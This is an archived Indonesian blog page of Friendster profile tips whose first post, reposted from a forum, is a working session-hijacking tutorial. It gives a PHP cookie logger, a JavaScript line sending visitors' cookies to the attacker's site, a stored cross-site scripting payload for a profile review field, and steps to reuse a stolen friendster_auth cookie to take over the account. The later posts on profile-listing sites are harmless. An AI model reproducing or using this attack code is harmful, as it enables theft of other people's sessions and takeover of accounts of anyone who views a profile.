<body><script type="text/javascript"> function setAttributeOnload(object, attribute, val) { if(window.addEventListener) { window.addEventListener('load', function(){ object[attribute] = val; }, false); } else { window.attachEvent('onload', function(){ object[attribute] = val; }); } } </script> <div id="navbar-iframe-container"></div> <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script> <script type="text/javascript"> gapi.load("gapi.iframes:gapi.iframes.style.bubble", function() { if (gapi.iframes && gapi.iframes.getContext) { gapi.iframes.getContext().openChild({ url: 'https://www.blogger.com/navbar.g?targetBlogID\x3d3225853982274805715\x26blogName\x3dTrick+Modifikasi+Friendster\x26publishMode\x3dPUBLISH_MODE_BLOGSPOT\x26navbarType\x3dBLUE\x26layoutType\x3dCLASSIC\x26searchRoot\x3dhttp://friendstermod.blogspot.com/search\x26blogLocale\x3den_US\x26v\x3d2\x26homepageUrl\x3dhttp://friendstermod.blogspot.com/\x26vt\x3d-1975866805049510614', where: document.getElementById("navbar-iframe-container"), id: "navbar-iframe" }); } }); </script>
FriendsterMod Free friendster layoutKumpulan Layout friendster tutorial, themes, skin, graphic, juga cewek cantik di friendster.
Powered by  MyPagerank.Net
5/20/07 - 5/27/07
5/27/07 - 6/3/07
6/24/07 - 7/1/07
9/2/07 - 9/9/07
9/16/07 - 9/23/07
9/23/07 - 9/30/07
9/30/07 - 10/7/07
10/14/07 - 10/21/07
10/21/07 - 10/28/07
10/28/07 - 11/4/07
11/4/07 - 11/11/07
11/11/07 - 11/18/07
11/18/07 - 11/25/07
11/25/07 - 12/2/07
12/23/07 - 12/30/07
12/30/07 - 1/6/08
1/6/08 - 1/13/08
2/10/08 - 2/17/08
2/24/08 - 3/2/08
3/9/08 - 3/16/08
3/16/08 - 3/23/08
3/23/08 - 3/30/08
3/30/08 - 4/6/08
4/6/08 - 4/13/08
4/13/08 - 4/20/08
4/20/08 - 4/27/08
4/27/08 - 5/4/08
5/4/08 - 5/11/08
5/11/08 - 5/18/08
5/18/08 - 5/25/08
5/25/08 - 6/1/08
6/1/08 - 6/8/08
6/8/08 - 6/15/08
6/15/08 - 6/22/08
6/22/08 - 6/29/08
6/29/08 - 7/6/08
7/6/08 - 7/13/08
7/13/08 - 7/20/08
7/20/08 - 7/27/08
7/27/08 - 8/3/08
8/3/08 - 8/10/08
8/10/08 - 8/17/08
8/17/08 - 8/24/08
8/24/08 - 8/31/08
8/31/08 - 9/7/08
9/7/08 - 9/14/08
9/14/08 - 9/21/08
10/5/08 - 10/12/08
10/12/08 - 10/19/08
10/19/08 - 10/26/08
10/26/08 - 11/2/08
11/2/08 - 11/9/08
11/9/08 - 11/16/08
11/16/08 - 11/23/08
11/23/08 - 11/30/08
11/30/08 - 12/7/08
12/7/08 - 12/14/08
12/14/08 - 12/21/08
12/21/08 - 12/28/08
12/28/08 - 1/4/09
1/4/09 - 1/11/09
1/11/09 - 1/18/09
1/18/09 - 1/25/09
2/1/09 - 2/8/09
2/8/09 - 2/15/09
2/22/09 - 3/1/09
3/8/09 - 3/15/09
3/22/09 - 3/29/09
3/29/09 - 4/5/09
4/5/09 - 4/12/09
4/19/09 - 4/26/09
4/26/09 - 5/3/09
5/3/09 - 5/10/09
5/10/09 - 5/17/09
5/17/09 - 5/24/09
6/14/09 - 6/21/09
6/21/09 - 6/28/09
7/5/09 - 7/12/09
7/12/09 - 7/19/09
7/19/09 - 7/26/09
8/2/09 - 8/9/09
8/9/09 - 8/16/09
8/23/09 - 8/30/09
11/1/09 - 11/8/09

Advertisements
Google



Add to Google Reader or Homepage
Add to My AOL

web counter



Lihat Hits



Met Datang di FriendsterMod - Friendster Layout ??
Tutorial Layout Friendster tweaking profile FS
Welcome to Friendstermod. place where you can find Free Friendster Layout, skin, themes, you can download that layout for free and use it at your friendster profile. Layouts are well designed and optimized under friendster CSS code. Download free skins or request your own friendster layout themes.
Subscribe with Friendstermod (New)
Ingin berlangganan Free friendster layout lewat email?Tidak hanya friendster layout buatan Friendstermod, tapi juga seluruh artikel dan posting blog tentang tips trik Friendster juga akan langsung terupdate dengan cepat lewat email kamu. Silahkan Masukkan Email


2000 orang lebih para Friendsterholic telah berlangganan layout, tips dan trik Friendster dari FriendsterMod. Ayo buruan gabung sekarang juga.
Preview | Powered by FeedBlitz

Wednesday, June 27, 2007
Steal Cookie Trik.Friendster..
Ini merupakan artikel penting dapat dari salah satu post di Kaskus. Silahkan baca semoga bermanfaat. start di bawah ini.. Langsung ajaaa.. Persiapan wajibb : ~MarlBoro Merah *mantap ni roko! FIREFOX , wajib!! download add-ons firefox.. Cookie Editor! install restart firefox.. 1. Save as ini jadi cookies.php
Code:
<?php
$kokis = $HTTP_GET_VARS['kukis'];
$filename = "cookie.txt";
$ip = getenv ('REMOTE_ADDR');
$date=date("d/m/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');


$handle = fopen($filename, 'a');
#fwrite($handle, $kokis, $ip, $date, $referer);
fwrite($handle, "\n".$ip.' :: '.$date."\n".$referer." :: ".$kokis."\n");
fClose($handle);

echo "<script>document.location='http://www.friendster.com/';</script>";

?>
2. bikin text kosong, trus kasi nama cookie.txt , upload ke hostingan lo..CHMOD jadi 777 3. save ini jadi hack.js
Code:
parent.document.location='http://website.lo.disini!!/cookies.php?kukis='+document.cookie
*ganti tulisan yang di bold jadi url web lo.. 4. bikin comment di fs lo, ni url nya..
Code:
http://www.friendster.com/review.php?action=add
5. isi ini di "my review"
Code:
<div id=markloreto style=display:none></div>
<script defer src=http://website.lo.disini/hack.js></script>
DONE!

nanti kalo ada someone liat profile lo..dia langsung redirect n logging cookie nye..

buka cookies.txt. lo akan liat ada ini
Code:
xxx.xxx.xxx.xxx :: 2x/0x/200x 2:44:16 pm
http://www.friendster.com/user.php?sc=2510 :: __utmz=110198994.1182389400.62.3.utmccn=(referral)|utmcsr=keluarganugraha.net|utmcct=/contact.html|utmcmd=referral; __utma=110198994.1006787849.1178847898.1182923589.1182929696.79; CP=null*; friendster_HBX=lucky=nope; friendster_cacheList=/=1182913326125&/user.php=1182923722859&/friends.php=1182924774234; __utmc=110198994; friendster_update=/,/user.php,/friends.php; __utmb=110198994; friendster_auth=uid=xxxxxxx&lastclick=1182930245&cty=id&icty=id&mac=ZjA1MGQ3MDIzOGJlOWY4ZDlkNmRiZGE5OThiNzgzNDQ*; friendster_tzoffset=25200; friendster_6apart_auth=uid=xxxxxxx&lastclick=1182930245&timeout=1183016645&cty=id&mac=NDYwNzkzYjkyNTFiZTkyNDRjYTg4MDFiYzJhNWRkNGU*; friendster_pusit_auth=uid=xxxxxxx&lastclick=1182930245&timeout=1183016645&cty=id&mac=ODFhN2Y0MmEyN2I4Mjc0ZTYwYWEyMGMxYzdmNzEzMWQ*; friendster_olx_auth=uid=xxxxxxx&lastclick=1182930245&timeout=1183016645&ip_country=ID&country=ID&mac=NTQxNzljZWE2OGVhMDE2MDMyYTEzODA5ZDVhZjM2ZGE*
cari friendster_auth=, copy dr ' uid ' sampe '*'
Code:
uid=xxxxxxx&lastclick=1182930245&cty=id&icty=id&mac=ZjA1MGQ3MDIzOGJlOWY4ZDlkNmRiZGE5OThiNzgzNDQ*
ganti character " = " jadi %3D ganti character " & " jadi %26 ganti character " * " jadi %2A jadinya kya gni
Code:
uid%26xxxxxxx%26lastclick%3D1182930245%26cty%3Did%26icty%3Did%26mac%3DZjA1MGQ3MDIzOGJlOWY4ZDlkNmRiZGE5OThiNzgzNDQ%2A
klik tool - > cookie editor.. di paling atas tulis " friendster " trus enter! cari tulisan yang sbelah kanan ada " friendster_auth " klik 2x ganti content pake script di atas yang uda di ganti.. save close.. DONE!! buka "http://friendster.com" liat ada apa di sana.. Artikel tersebut originally posted by Aristia di kaskus, kalau kalian suka silahkan kasih dia GRP dengan mengklik link disini
Read more | Baca lagi
AddThis Social Bookmark Button | AddThis Feed Button
Ditulis oleh FriensterMod Team @ 5:13 PM.  

Mendaftarkan Friendster kamu di Wargafriendster.com
Kalau sebelumnya kamu sudah pernah baca tips untuk menjadi terkenal/popular di dunia Friendster, maka trik be-fiendster yang satu ini juga kudu kamu baca. Adalah sebuah situs keren bernama Wargafriendster yang bisa kamu akses di http://wargafriendster.com/ yang menyediakan layanan friendster url listing. Saat kamu mengakses situs tersebut akan telihat di halaman depan form untuk bergabung 'join'. Selain kamu bisa bergabung, kamu juga bisa melakukan pencarian ber-hunting kenalan untuk menambah friends (teman) friendstermu karena di situ terdapat banyak sekali alamat friendster orang-orang keren beserta alamat friendster-nya (red; fiendster url) yang bisa kamu klik langsung untuk melihat profile lengkapnya di friendster.
Dengan ikut bergabung menjadi anggota situs ini maka kamu dapat mempromosikan alamat friendster kamu dengan menggunakan friendster url profile FS mu yang bisa dilihat di bagian depan halaman profile friendstermu. Bagaimana cara mendaftar dan menggunakan website tersebut? oke..berikut akan saya coba jelaskan sedikit karena kalau banyak2 juga kalian bisa capek bacanya dan halaman blog ini gak cukup.
Mendaftar di Wargafriendster.com - caranya cukup mudah. Cukup langsung menuju situsnya di http://wargafriendster.com maka secara default pada bagian depan situs kamu akan menemui form untuk join, atau kamu bisa klik di sini. Pada formulir pendaftaran yang telah tersedia silahkan isi dengan profile kamu sesuai dengan pertanyaan yang tersedia.
gabung di wargafriendster.com
Kolom 'Category' merupakan areal/lokasi kota tempat tinggal kamu atau kota yang terdekat dengan domisilimu. Silahkan pilih sesuai dropdown menu yang ada. Sepertinya hanya nama-nama kota besa di Indonesia saja yang tersedia, so kalau kota kamu tidak tercantum ya pilih saja yang paling terdekat.
Kemudian kolom 'Friendster url' ini meupakan kolom terpenting yang akan menunjukkan alamat friendste kamu pada dunia. Isikan dengan url profile friendster kamu, kalau belum tau url ini bisa kamu liat di profile friendster kamu yang dimulai dengan 'http://' contoh 'http://www.friendster.com/74539829' atau juga bisa dirubah melalui settingan profile friendster kamu seperti 'http://www.friendster.com/josgandos'.
Kolom 'Your name + title' isikan saja nama kamu, nama lengkap kamu, nama panggilan, atau kata-kata yang menarik orang lain sehingga ingin mengunjungi friendstermu. Usahakan gunakan kata-kata yang dapat mengundang perhatian orang lain sehingga merasa tertarik untuk kenal kamu lebih jauh dengan mengunjungi alamat friendster kamu tentunya.
Kolom 'Description + About me' isikan dengan kata-kata yang menggambarkan profile probadimu secara umum, singkat dan jelas. Atau tips cepatnya untuk mengisi kolom ini adalah dengan meng-copy-paste-kan kolom about me yang ada di friendster kamu. Usahakan gunakan rangkaian kata yang cukup keren dan menarik. Atau jika masih bingung cukup isikan saja data profilemu seperti nama panggilan, tempat tinggal, umur, laki atau perempuan, de el el.
Kolom 'email' sudah jelas cukup isikan alamat email kamu. Fungsinya jika suatu saat kamu lupa pasword untuk meng-edit input form pendaftaran tersebut atau jika kamu ingin melakukan perubahan deskripsi profile friendster kamu beserta alamatnya.
Kolom 'password' isi saja dengan kata kunci yang mudah diingat, kemudian isikan lagi (ulangi) pada kolom 'repeat password'. Sedangkan kolom terakhi adalah 'Secure code' isikan saja sesuai huruf yang terlihat pada bagian bawah kolom tersebut dan jangan sampai salah. Fungsi Secure code hanya untuk melakukan verifikasi input data dan menghindari spam saja. Kalau semua kolom form pendaftaran telah lengkap langsung klik tombol 'Submit it'.
widget buat friendsterMemasang widget di Friendster profile - Jika proses pendaftaran telah selesai maka kamu akan langsung mendapatkan widget keren yang dapat di pasang di halaman profile friendstermu atau kamu kirimkan ke testimonial teman kamu di friendster. Bagaimana caranya? pada bagian bawah gambar tersebut kamu akan melihat sekumpulan kode-kode dalam kolom yang bisa kamu copy lalu kamu paste-kan di profile FS kamu (coba di kolom about me). Atau kamu paste-kan di kolom pengiriman testi teman kamu. Fungsinya jika ada seseorang atau teman kamu yang mengklik logo/widget tersebut dia akan langsung dibawa ke halaman vote untuk mendukung friendster kamu, keren khan..?
Tips menggunakan wargafriendster widget - Bagaimana menggunakan widget tersebut agar efektif dan semakin banyak yang mendukung friendster kamu? sebenarnya bisa saja kamu kirim widgets tersebut lewat testi teman kamu disertai kata-kata manis. Namun dapat dipercepat dengan mengirimnya lewat send messege / kirim pesan biasa langsung ke banyak teman kamu yang sudah ada di friendster. Jika kamu aktif nge-blog kamu juga bisa paste-kan ke template blog kamu di Blogger, wordpress, atau apasaja sebab kode tersebut merupakan kode html standard. Atau jika kamu aktif ikut forum/komunitas, cukup ambil saja url link untuk vote sekalian juga url gambar widgetnya. Ya, mudah-mudahan saja saya gak lupa. Kalau sempat akan saya coba posting trik memasukkan widget tersebut di signature forum dan untuk di posting di forum. Semoga saja..
Read more | Baca lagi
AddThis Social Bookmark Button | AddThis Feed Button
Ditulis oleh FriensterMod Team @ 4:02 PM.  

Situs Indo penting buat Friendster kamu
Semalam saya coba mikir apa saja website Indonesia yang berguna untuk para pengguna Friendster indo. Seperti yang kita tau bahwa selama ini mayoritas pengguna Friendster berasal dari negara-negara di Asia Tenggara seperti Indonesia dan Philipina. Sudah banyak situs-situs non-indonesia yang membahas serta bermanfaat untuk pecinta Friendster seperti Friendster tweaker, friendster talk, de el el yang sebagian bear berusaha membantu pengguna Friendster untuk mempercantik tampilan profile mereka. Bahkan sebagian situs juga merangkap sebagai profile editor / profile generator untuk friendster dan MySpace. Akhir-akhir ini friendster sebagai situs pertemanan terkemuka yang lebih populer di Indonesia mulai dilirik juga oleh para webmaster karena lebih targeted untuk orang Indonesia tentunya (gak tau juga apa yang di tagetin dari visitor Indo), sebab kebanyakan penduduk dunia lebih memlilih Hi5 dan MySpace sebagai situs pertemanan yang lebih global dan lebih diminati oleh kebanyakan rakyat dunia. Bahkan artist-artist manca juga banyak yang punya account di Myspace, tak ketinggalan juga band-band tenar manca seperti new found glory, rancid, noFX, juga punya myspace. Menariknya sekarang juga mulai berjamuran band-band Indie yang menggunakan myspace sebagai sarana memperkenalkan eksistensi band mereka di dunia, terutama band beraliran alternative seperti punk, rock, metal, underground, melodik, emo, bahkan metalcore.
Kembali ke pembicaaan, yaitu situs apa saja sich yang memfasilitasi friendsterholic dan friendstergenic untuk menambah pengalaman mereka dalam ber-friendster ria? sampai sejauh ini saya baru mengetahui dua situs menarik yang melirik friendster muda indonesia (kamu), yaitu Carimuka.com dan Wargafriendster.com.
Carimuka.com - Sebuah situs menarik yang menyediakan jasa voting alias jajak pendapat sekedar untuk mengetahui kualitas wajahmu di foto yang biasa kamu pajang di profile friendstermu. Cukup kamu upload foto tersebut kemudian kamu akan diberi kode-kode unik yang bisa kamu pajang juga di friendster profilmu atau kamu kirim ke testi teman kamu agar teman kamu bisa memberikan vote atas wajah kamu. cukup unik bukan??
Wargafriendster.com - Situs ini juga menyediakan jasa layanan vote untuk melisting friendster kamu. Dengan menggunakan url friendstermu (dilihat di profile FS mu) kamu bisa ikutan gabung. Jika carimuka.com bisa membantu agar teman kamu meberikan vote atas wajah kamu, maka wargafriendster.com ini menjadikan semua orang, teman, saudara kamu dapat memberikan dukungan atas 'profile friendster'mu dan bukan 'wajah'mu. Tujuan dari situs ini mungkin agar menjadikan profile friendster anggotanya menjadi lebih terkenal/populer. Caranya juga sama, setelah bergabung kamu akan diberi kode unik yang bisa kamu kopi-paste-kan di halaman uatama profile FS-mu atau kamu kirimkan lewat testi teman kamu. Kenapa? agara kamu lebih terkenal dan banyak teman tentunya. Selain itu disitus ini kamu juga bisa browsing hunting teman-teman baru loh..cewek cakep dan cowok keren bisa langsung kamu add di daftar teman friendster kamu, khan ada alamat url friendsternya.
Nah berhubung saya cuman tau dua itu saja, dan niat saya untuk me-list situs yang berguna buat friendster belum juga kelar, maka saya sangat mengharap tambahan dari teman2 sekalian. Langsung aja post lewat comments yang terbuka untuk siapa saja koq dan gak perlu punya account atau login ke blogger dulu. Ayo silahkan bagi yang tau situs apa saja yang berkaitan dan bermanfaat buat para friendster Indonesia.
Read more | Baca lagi
AddThis Social Bookmark Button | AddThis Feed Button
Ditulis oleh FriensterMod Team @ 3:51 PM.  

Cool Stuff buat reader Friendstermod

Free domain CO.CC

Perhatian, Tim FriendsterMod tidak memiliki hubungan khusus apapun dengan pihak Friendster begitupun sebaliknya. Blog ini sebagai media informasi yang menyampaikan tentang tips trik yang bisa dilakukan untuk merubah tampilan profil friendster dari yang sederhana hingga yang intermediate. Kami juga tidak bertanggung jawab atas kemungkinan apapun yang timbul akibat penggunaan isi artikel dalam blog ini. Gunakan dan praktekkan dengan kesadaran dan tanggung jawab penuh pada diri kamu sendiri.
FriendsterMod new skin beta. Best viewed at 1024x768 pixel.